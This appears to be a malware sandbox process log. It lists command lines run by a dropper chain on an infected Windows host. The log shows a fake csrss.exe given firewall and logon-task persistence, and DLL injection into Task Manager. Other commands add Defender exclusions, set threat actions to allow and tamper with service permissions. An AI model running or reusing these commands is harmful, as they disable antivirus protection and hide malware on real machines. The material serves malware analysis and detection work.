C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e68e1d0,0x6e68e1dc,0x6e68e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe" --version

C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe

"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3208 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140451" --session-guid=8aaab569-435b-484d-b795-e57cfab4635d --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6da0e1d0,0x6da0e1dc,0x6da0e1e8

C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe

"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x426038,0x426044,0x426050

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\ulc.3.exe

"C:\Users\Admin\AppData\Local\Temp\ulc.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 768 -ip 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1552

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe

"C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe

.\Install.exe /nxdidQZJ "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe\" em /TIsite_iduEE 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe em /TIsite_iduEE 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

